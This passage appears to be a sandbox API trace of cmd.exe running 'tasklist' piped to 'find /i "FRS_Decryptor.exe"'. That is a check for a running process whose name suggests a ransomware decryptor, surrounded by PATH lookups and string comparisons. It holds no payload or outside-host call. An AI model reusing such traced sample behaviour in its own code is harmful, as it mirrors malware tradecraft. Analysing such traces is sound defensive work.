(_String1="tasklist", _String2="COPY") returned 17 [0070.490] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0070.490] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0070.490] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0070.490] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0070.490] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0070.490] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0070.490] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0070.490] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0070.490] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0070.490] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0070.490] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0070.490] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0070.490] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0070.490] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0070.490] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0070.490] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0070.490] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0070.490] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0070.490] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0070.490] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0070.490] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0070.490] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0070.490] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0070.490] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0070.490] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0070.490] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0070.490] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0070.491] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0070.491] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0070.491] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0070.491] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0070.491] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0070.491] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0070.491] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0070.491] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0070.491] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0070.491] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0070.491] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0070.491] SetErrorMode (uMode=0x0) returned 0x0 [0070.491] SetErrorMode (uMode=0x1) returned 0x0 [0070.491] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8c5228, lpFilePart=0x63f44c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x63f44c*="Desktop") returned 0x1c [0070.491] SetErrorMode (uMode=0x0) returned 0x1 [0070.491] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0070.491] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0070.495] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.496] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.496] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0xffffffff [0070.496] GetLastError () returned 0x2 [0070.496] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.497] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0x8c5530 [0070.497] FindClose (in: hFindFile=0x8c5530 | out: hFindFile=0x8c5530) returned 1 [0070.497] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0xffffffff [0070.497] GetLastError () returned 0x2 [0070.497] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0x8c5530 [0070.497] FindClose (in: hFindFile=0x8c5530 | out: hFindFile=0x8c5530) returned 1 [0070.497] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0070.497] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0070.497] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0070.497] SetErrorMode (uMode=0x0) returned 0x0 [0070.497] SetErrorMode (uMode=0x1) returned 0x0 [0070.498] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8ca3c0, lpFilePart=0x63f1f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x63f1f4*="Desktop") returned 0x1c [0070.498] SetErrorMode (uMode=0x0) returned 0x1 [0070.498] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0070.498] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0070.498] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.498] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.498] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0xffffffff [0070.498] GetLastError () returned 0x2 [0070.498] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.498] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0x8c5628 [0070.498] FindClose (in: hFindFile=0x8c5628 | out: hFindFile=0x8c5628) returned 1 [0070.498] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0xffffffff [0070.499] GetLastError () returned 0x2 [0070.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0x8c5628 [0070.499] FindClose (in: hFindFile=0x8c5628 | out: hFindFile=0x8c5628) returned 1 [0070.499] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0070.499] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0070.499] GetConsoleTitleW (in: lpConsoleTitle=0x63f47c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0070.500] InitializeProcThreadAttributeList (in: lpAttributeList=0x63f3a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x63f38c | out: lpAttributeList=0x63f3a8, lpSize=0x63f38c) returned 1 [0070.500] UpdateProcThreadAttribute (in: lpAttributeList=0x63f3a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x63f394, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x63f3a8, lpPreviousValue=0x0) returned 1 [0070.500] GetStartupInfoW (in: lpStartupInfo=0x63f3e0 | out: lpStartupInfo=0x63f3e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2f0, hStdError=0x2c)) [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0070.500] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0070.501] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0070.501] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0070.502] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x63f330*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x63f37c | out: lpCommandLine="tasklist", lpProcessInformation=0x63f37c*(hProcess=0x64, hThread=0x60, dwProcessId=0x8c4, dwThreadId=0x434)) returned 1 [0070.650] CloseHandle (hObject=0x60) returned 1 [0070.650] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.650] GetEnvironmentStringsW () returned 0x8c42d8* [0070.650] FreeEnvironmentStringsA (penv="=") returned 1 [0070.650] DeleteProcThreadAttributeList (in: lpAttributeList=0x63f3a8 | out: lpAttributeList=0x63f3a8) [0070.650] _get_osfhandle (_FileHandle=3) returned 0x54 [0070.650] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0070.650] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0070.650] _close (_FileHandle=5) returned 0 [0070.650] _dup (_FileHandle=0) returned 4 [0070.650] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0070.650] _close (_FileHandle=3) returned 0 [0070.650] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0070.650] SetErrorMode (uMode=0x0) returned 0x0 [0070.650] SetErrorMode (uMode=0x1) returned 0x0 [0070.650] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8c42e0, lpFilePart=0x63f44c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x63f44c*="Desktop") returned 0x1c [0070.650] SetErrorMode (uMode=0x0) returned 0x1 [0070.651] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0070.651] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0070.651] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.651] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.651] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0xffffffff [0070.651] GetLastError () returned 0x2 [0070.651] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.651] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0x8c5628 [0070.651] FindClose (in: hFindFile=0x8c5628 | out: hFindFile=0x8c5628) returned 1 [0070.651] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0xffffffff [0070.651] GetLastError () returned 0x2 [0070.651] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x63f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63f1d8) returned 0x8c5628 [0070.651] FindClose (in: hFindFile=0x8c5628 | out: hFindFile=0x8c5628) returned 1 [0070.651] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0070.652] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0070.652] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0070.652] SetErrorMode (uMode=0x0) returned 0x0 [0070.652] SetErrorMode (uMode=0x1) returned 0x0 [0070.652] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8c4668, lpFilePart=0x63f1f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x63f1f4*="Desktop") returned 0x1c [0070.652] SetErrorMode (uMode=0x0) returned 0x1 [0070.652] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0070.652] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0070.652] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.652] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0xffffffff [0070.652] GetLastError () returned 0x2 [0070.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.652] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0x8c04a0 [0070.653] FindClose (in: hFindFile=0x8c04a0 | out: hFindFile=0x8c04a0) returned 1 [0070.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0xffffffff [0070.653] GetLastError () returned 0x2 [0070.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x63ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x63ef80) returned 0x8c04a0 [0070.653] FindClose (in: hFindFile=0x8c04a0 | out: hFindFile=0x8c04a0) returned 1 [0070.653] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0070.653] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0070.653] GetConsoleTitleW (in: lpConsoleTitle=0x63f47c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0070.665] InitializeProcThreadAttributeList (in: lpAttributeList=0x63f3a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x63f38c | out: lpAttributeList=0x63f3a8, lpSize=0x63f38c) returned 1 [0070.665] UpdateProcThreadAttribute (in: lpAttributeList=0x63f3a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x63f394, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x63f3a8, lpPreviousValue=0x0) returned 1 [0070.666] GetStartupInfoW (in: lpStartupInfo=0x63f3e0 | out: lpStartupInfo=0x63f3e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2f0, hStdError=0x2c)) [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0070.666] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0070.667] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0070.667] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x63f330*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x63f37c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x63f37c*(hProcess=0x60, hThread=0x54, dwProcessId=0x5a0, dwThreadId=0x4e8)) returned 1 [0070.669] CloseHandle (hObject=0x54) returned 1 [0070.669] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.669] GetEnvironmentStringsW () returned 0x8cad78* [0070.669] FreeEnvironmentStringsA (penv="=") returned 1 [0070.669] DeleteProcThreadAttributeList (in: lpAttributeList=0x63f3a8 | out: lpAttributeList=0x63f3a8) [0070.669] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0070.669] _close (_FileHandle=4) returned 0 [0070.669] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0073.196] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x63f6f0 | out: lpExitCode=0x63f6f0*=0x0) returned 1 [0073.196] CloseHandle (hObject=0x64) returned 1 [0073.196] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0073.198] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x63f6f0 | out: lpExitCode=0x63f6f0*=0x0) returned 1 [0073.198] CloseHandle (hObject=0x60) returned 1 [0073.198] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0073.198] SetConsoleMode (hConsoleHandle=0x2f0, dwMode=0x0) returned 0 [0073.198] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0073.198] GetConsoleMode (in: hConsoleHandle=0x2f0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0073.198] _get_osfhandle (_FileHandle=0) returned 0x24 [0073.198] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0073.199] SetConsoleInputExeNameW () returned 0x1 [0073.199] GetConsoleOutputCP () returned 0x1b5 [0073.199] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0073.199] 